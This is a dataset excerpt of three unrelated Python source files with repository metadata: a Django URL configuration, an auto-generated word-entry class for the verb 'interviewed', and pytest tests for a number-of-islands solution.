fae041b6f545357627db8a4e4d1117a61ad3b850 | 507daab36fdc1be0008d5dbcdb4402e299f6da8a | /mysite/mysite/urls.py | 461a1e33e3c7ee75eabf8812862d0bc858b88bf1 | [] | no_license | atmosphere1365/mastered | 057cf80b9969bfba690aef4009e4f6b39703471d | b777728eb656b4fc209c1cb2592ed35fc0864b83 | refs/heads/master | 2020-09-16T09:35:50.941166 | 2019-11-24T11:24:43 | 2019-11-24T11:24:43 | 223,729,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('grappelli/', include('grappelli.urls')), # grappelli URLS
path('admin/', admin.site.urls),
path('', include('mainApp.urls')),
path('007', include('blog.urls')),
path('news/', include('news.urls')),
] | [
"you@example.com"
] | you@example.com |
6f1a8f80c6cc21deb42ee605ff08484974623be8 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_interviewed.py | 661432027101ffd3f901f39af597b5a42f7dd1a0 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py |
from xai.brain.wordbase.verbs._interview import _INTERVIEW
# class header
class _INTERVIEWED(_INTERVIEW, ):
    """Word entry for the past-tense form of 'interview'.

    Presumably auto-generated (one file per word form); inherits all
    behaviour from _INTERVIEW and only overrides identifying metadata.
    """
    def __init__(self,):
        _INTERVIEW.__init__(self)
        self.name = "INTERVIEWED"   # surface form of this entry
        self.specie = 'verbs'       # part-of-speech bucket
        self.basic = "interview"    # lemma / base form
        self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
3c4f0d6329fae0254ec8bb1115b4712d8a53553f | a8314fb4e71a229f2288ca0588bbb3ebd58b7db0 | /leet/number_of_islands/test.py | 2920c806eccab6da138ebbf27ddc5c6f99a14a53 | [] | no_license | blhwong/algos_py | 6fc72f1c15fe04f760a199535a0df7769f6abbe6 | 9b54ad6512cf0464ecdd084d899454a99abd17b2 | refs/heads/master | 2023-08-30T17:45:51.862913 | 2023-07-24T18:56:38 | 2023-07-24T18:56:38 | 264,782,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | from leet.number_of_islands.main import Solution
s = Solution()
def test_1():
    """One connected landmass in the top-left corner -> exactly one island."""
    grid = [list(row) for row in ("11110", "11010", "11000", "00000")]
    assert s.numIslands(grid) == 1
def test_2():
    """Three separate landmasses -> three islands."""
    grid = [list(row) for row in ("11000", "11000", "00100", "00011")]
    assert s.numIslands(grid) == 3
| [
"brandon@yerdle.com"
] | brandon@yerdle.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.